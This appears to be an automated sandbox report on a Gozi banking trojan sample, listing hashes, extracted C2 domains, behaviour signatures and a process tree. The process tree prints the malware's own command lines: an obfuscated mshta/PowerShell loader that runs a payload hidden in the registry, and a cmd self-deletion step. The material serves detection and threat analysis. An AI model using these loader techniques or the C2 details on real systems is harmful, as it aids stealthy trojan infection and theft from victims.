gozi | 7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6

Resubmissions

06-10-2023 00:32

231006-avxlbaac38 10

06-10-2023 00:31

231006-at7pwsgb5s 10

05-10-2023 16:10

231005-tmvxasec87 10

Analysis

max time kernel
150s
max time network
134s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
06-10-2023 00:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe
Size

304KB
MD5

a3f4c907a088c99a8b7bf5f4280d7d0c
SHA1

9a9297bd0af1c008eb7477c1e310ce70c30c6d56
SHA256

7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6
SHA512

106a0a4275a421a6dbef6c43e76921e6eae1aca5f6d960f823763a3127b7ebf826c626da460db82451aba4a94c32c8c198d6871b0a2c6de7d96c937384e92f9b
SSDEEP

6144:Oo+91vDNpa6NK56upTHirwtc3nhBvjQOR/Oz2IHTN+:ONDLu4K56u1HqfhBvjQOWz2W

Score

10^/10

gozi 5050 banker dave isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Dave packer 1 IoCs

Detects executable using a packer named 'Dave' by the community, based on a string at the end.

dave

Processes:

resource	yara_rule
behavioral2/memory/2084-1-0x0000000001370000-0x000000000137C000-memory.dmp	dave

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2188 set thread context of 3252	2188	powershell.exe	Explorer.EXE
PID 3252 set thread context of 3792	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 set thread context of 3292	3252	Explorer.EXE	cmd.exe
PID 3292 set thread context of 3592	3292	cmd.exe	PING.EXE
PID 3252 set thread context of 4272	3252	Explorer.EXE	WinMail.exe
PID 3252 set thread context of 5016	3252	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3592 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3592 PING.EXE

pid	process
3592	PING.EXE

pid	process
3592	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exepowershell.exeExplorer.EXE

pid	process
2084	7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe
2084	7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2188 powershell.exe
3252 Explorer.EXE
3252 Explorer.EXE
3292 cmd.exe
3252 Explorer.EXE
3252 Explorer.EXE

pid	process
2188	powershell.exe
3252	Explorer.EXE
3252	Explorer.EXE
3292	cmd.exe
3252	Explorer.EXE
3252	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3252 Explorer.EXE

pid	process
3252	Explorer.EXE

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4992 wrote to memory of 2188	4992	mshta.exe	powershell.exe
PID 4992 wrote to memory of 2188	4992	mshta.exe	powershell.exe
PID 2188 wrote to memory of 344	2188	powershell.exe	csc.exe
PID 2188 wrote to memory of 344	2188	powershell.exe	csc.exe
PID 344 wrote to memory of 4732	344	csc.exe	cvtres.exe
PID 344 wrote to memory of 4732	344	csc.exe	cvtres.exe
PID 2188 wrote to memory of 2696	2188	powershell.exe	csc.exe
PID 2188 wrote to memory of 2696	2188	powershell.exe	csc.exe
PID 2696 wrote to memory of 4376	2696	csc.exe	cvtres.exe
PID 2696 wrote to memory of 4376	2696	csc.exe	cvtres.exe
PID 2188 wrote to memory of 3252	2188	powershell.exe	Explorer.EXE
PID 2188 wrote to memory of 3252	2188	powershell.exe	Explorer.EXE
PID 2188 wrote to memory of 3252	2188	powershell.exe	Explorer.EXE
PID 2188 wrote to memory of 3252	2188	powershell.exe	Explorer.EXE
PID 3252 wrote to memory of 3792	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3792	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3792	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3792	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3292	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 3292	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 3292	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 3292	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 3292	3252	Explorer.EXE	cmd.exe
PID 3292 wrote to memory of 3592	3292	cmd.exe	PING.EXE
PID 3292 wrote to memory of 3592	3292	cmd.exe	PING.EXE
PID 3292 wrote to memory of 3592	3292	cmd.exe	PING.EXE
PID 3292 wrote to memory of 3592	3292	cmd.exe	PING.EXE
PID 3292 wrote to memory of 3592	3292	cmd.exe	PING.EXE
PID 3252 wrote to memory of 4272	3252	Explorer.EXE	WinMail.exe
PID 3252 wrote to memory of 4272	3252	Explorer.EXE	WinMail.exe
PID 3252 wrote to memory of 4272	3252	Explorer.EXE	WinMail.exe
PID 3252 wrote to memory of 4272	3252	Explorer.EXE	WinMail.exe
PID 3252 wrote to memory of 4272	3252	Explorer.EXE	WinMail.exe
PID 3252 wrote to memory of 5016	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 5016	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 5016	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 5016	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 5016	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 5016	3252	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3252

C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe
"C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2084

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cbcj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbcj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C007E561-1FD8-F246-A9F4-C346ED68A7DA\\\GlobalPlay'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name osqaonf -value gp; new-alias -name qwqihh -value iex; qwqihh ([System.Text.Encoding]::ASCII.GetString((osqaonf "HKCU:Software\AppDataLow\Software\Microsoft\C007E561-1FD8-F246-A9F4-C346ED68A7DA").VirtualActive))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhg0ybzw\mhg0ybzw.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B4A.tmp" "c:\Users\Admin\AppData\Local\Temp\mhg0ybzw\CSC7AC440A73BDB4F61B36DF5A43202EAC.TMP"
5⤵
PID:4732

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uffhejzs\uffhejzs.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C34.tmp" "c:\Users\Admin\AppData\Local\Temp\uffhejzs\CSC5F1CE30B3DA491EA0A72B23434ECA7.TMP"
5⤵
PID:4376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3292

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3592

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:4272

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:5016

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES3B4A.tmp
Filesize
1KB

MD5
5bd98512338b299bb8b2bbc2c8fd4f61

SHA1
0d9bd6c3f6c593c1f744f2567df0e8544beebcad

SHA256
276aa4c64140f63fa79899b1fb9f6bbf75876888fe714bd8d88392a9c727b2fc

SHA512
cd6c8fb0d7e924cc49bcb0f37201fd7e7e6eae22e03c83b038fb537322fcfd9aa4687e004f7232de5be6e14bc507162e065ef052e1455e85bf306c01beda01d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3C34.tmp
Filesize
1KB

MD5
3e5c17d9afcc1b953d7d1a42fe1ba586

SHA1
1d229d71da9d76193c1653c06dfbd7d3ca31f622

SHA256
4c0ae0526a75b82498b0ac4c26171d8381e47f47162b3800c621ab4e603d8626

SHA512
c6b3f61214662442fa40f58d4c8c2dbbcae2221917627a4777021ac889c8d93b587984364e12899ce44bbfa80c87c8e0681f192f275fe928fe41d83f6f2acdcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2o2o3kp4.a0d.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\mhg0ybzw\mhg0ybzw.dll
Filesize
3KB

MD5
72d86159bee929c02bd1d18bc8dbda12

SHA1
8c393189092a8c0cdef557ab2100d94686711fd1

SHA256
fe0f0945c0618fdde0b78454217a78cf5b6ea83b336457c21f2429900a90a582

SHA512
7ac82c9dcde654fdd379a8e459c9dca192791c2b9aa44c402d2322734981f2d524c8323f03955367908796e9d1cdb2e3fad6726468d848f8005365f9e2464b50

Download Submit
C:\Users\Admin\AppData\Local\Temp\uffhejzs\uffhejzs.dll
Filesize
3KB

MD5
d965eaae9259a6c2ae59aa4755b828bb

SHA1
af2fa410fd4d44d2a3758da29629824f1b40acc9

SHA256
4bcd4a1adebc94d66d3baf980968500687a4f9244d38a4f763dd32baebffb347

SHA512
5497c2194ec805efdf6e8e3c58d70861b5cf664e8c28954643d1886a987e851237971ebbf55132ddfcb0c6b03f85fa2db31fd988275577023b9766a45c1ea950

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhg0ybzw\CSC7AC440A73BDB4F61B36DF5A43202EAC.TMP
Filesize
652B

MD5
e133f76884694d25410c8ba87dcf29da

SHA1
927a68c84f00734b2aab61350f4515514ada8405

SHA256
fc29900707d5526e3acc23b4dd4f51691517d5ad0b358e14a54681980ccc6b68

SHA512
fd6d517c65a7f0d57c9db60d9b35fd9155cf0973f824aad831fa1d2977aabb80ba61039612a8e23003ff7985348aac13f843b48d43adfe27fdd3ff1a2df37a3f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhg0ybzw\mhg0ybzw.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhg0ybzw\mhg0ybzw.cmdline
Filesize
369B

MD5
accda3949ded884057188cd3b2006afd

SHA1
c86e38dee600d1cabf538d59c3d287e4450572b8

SHA256
33571ffe5063b637c32717be23556296856fba6bc04bdc2fb6b5cf41c97c9957

SHA512
b0aa3d09ba7da599dbee19cc70c9156e7955323504cd957ee248b77faaffd76fe94675b10fd0aa45b06d335625f565020f73237aec0eb8c437cbc16019e6b118

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uffhejzs\CSC5F1CE30B3DA491EA0A72B23434ECA7.TMP
Filesize
652B

MD5
3f321e7ba89dbd282fc7eb3e6a5e5f65

SHA1
5745df2d8f31befb80286a3daa29319f117117f1

SHA256
ae638bbcd25b4cd50a1f4ddf23764633c3c54225009bd80a856b0d2f8fb179cb

SHA512
a93817995c3fbbd4b90aac5a3d6a4e399105a1d5ac68598a893c4038a3d5f12d91ad292ba493c10d1466b69a234429b224d73040b2a7469dec25b01d0baec6ae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uffhejzs\uffhejzs.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uffhejzs\uffhejzs.cmdline
Filesize
369B

MD5
fae0d62433b840ce68039c8a429686eb

SHA1
49f4d40de0e676a673382582672d25c0a248cb8c

SHA256
8b682c74c5891344f777c7e0ec3e89bfa56875d66cf5379d9664f072c9f56ac6

SHA512
5ddab669479682196e630ef81e2ba8f82a9c3cf497f1c7a7aff3cd0095796d7d0f7f20438051ab31e47073d9c3cffa716e94e67173444fe73687e7a24da2f9cd

Download Submit
memory/2084-11-0x00000000015B0000-0x00000000015BD000-memory.dmp

Filesize
52KB

Download
memory/2084-1-0x0000000001370000-0x000000000137C000-memory.dmp

Filesize
48KB

Download
memory/2084-5-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/2084-0-0x0000000001530000-0x000000000153F000-memory.dmp

Filesize
60KB

Download
memory/2188-74-0x0000018B34DE0000-0x0000018B34DF0000-memory.dmp

Filesize
64KB

Download
memory/2188-91-0x00007FFF45C80000-0x00007FFF4666C000-memory.dmp

Filesize
9.9MB

Download
memory/2188-26-0x0000018B34DE0000-0x0000018B34DF0000-memory.dmp

Filesize
64KB

Download
memory/2188-27-0x0000018B34FD0000-0x0000018B35046000-memory.dmp

Filesize
472KB

Download
memory/2188-25-0x0000018B34DE0000-0x0000018B34DF0000-memory.dmp

Filesize
64KB

Download
memory/2188-72-0x0000018B34FA0000-0x0000018B34FA8000-memory.dmp

Filesize
32KB

Download
memory/2188-23-0x00007FFF45C80000-0x00007FFF4666C000-memory.dmp

Filesize
9.9MB

Download
memory/2188-21-0x0000018B34E20000-0x0000018B34E42000-memory.dmp

Filesize
136KB

Download
memory/2188-76-0x0000018B35360000-0x0000018B3539D000-memory.dmp

Filesize
244KB

Download
memory/2188-58-0x0000018B34E10000-0x0000018B34E18000-memory.dmp

Filesize
32KB

Download
memory/2188-92-0x0000018B35360000-0x0000018B3539D000-memory.dmp

Filesize
244KB

Download
memory/3252-135-0x0000000003360000-0x0000000003404000-memory.dmp

Filesize
656KB

Download
memory/3252-143-0x00000000092B0000-0x00000000093EA000-memory.dmp

Filesize
1.2MB

Download
memory/3252-149-0x00000000092B0000-0x00000000093EA000-memory.dmp

Filesize
1.2MB

Download
memory/3252-147-0x00000000092B0000-0x00000000093EA000-memory.dmp

Filesize
1.2MB

Download
memory/3252-79-0x0000000001440000-0x0000000001441000-memory.dmp

Filesize
4KB

Download
memory/3252-78-0x0000000003360000-0x0000000003404000-memory.dmp

Filesize
656KB

Download
memory/3292-150-0x0000016D850C0000-0x0000016D85164000-memory.dmp

Filesize
656KB

Download
memory/3292-106-0x0000016D850C0000-0x0000016D85164000-memory.dmp

Filesize
656KB

Download
memory/3292-107-0x0000016D84D90000-0x0000016D84D91000-memory.dmp

Filesize
4KB

Download
memory/3592-115-0x000001F6D7DD0000-0x000001F6D7DD1000-memory.dmp

Filesize
4KB

Download
memory/3592-151-0x000001F6D7F40000-0x000001F6D7FE4000-memory.dmp

Filesize
656KB

Download
memory/3592-114-0x000001F6D7F40000-0x000001F6D7FE4000-memory.dmp

Filesize
656KB

Download
memory/3792-142-0x000002552C130000-0x000002552C1D4000-memory.dmp

Filesize
656KB

Download
memory/3792-97-0x0000025529AC0000-0x0000025529AC1000-memory.dmp

Filesize
4KB

Download
memory/3792-96-0x000002552C130000-0x000002552C1D4000-memory.dmp

Filesize
656KB

Download
memory/4272-122-0x000001A32BEC0000-0x000001A32BF64000-memory.dmp

Filesize
656KB

Download
memory/4272-129-0x000001A32BEC0000-0x000001A32BF64000-memory.dmp

Filesize
656KB

Download
memory/4272-123-0x000001A32BE90000-0x000001A32BE91000-memory.dmp

Filesize
4KB

Download
memory/5016-141-0x0000000000A30000-0x0000000000AC8000-memory.dmp

Filesize
608KB

Download
memory/5016-137-0x0000000000570000-0x0000000000571000-memory.dmp

Filesize
4KB

Download
memory/5016-134-0x0000000000A30000-0x0000000000AC8000-memory.dmp

Filesize
608KB

Download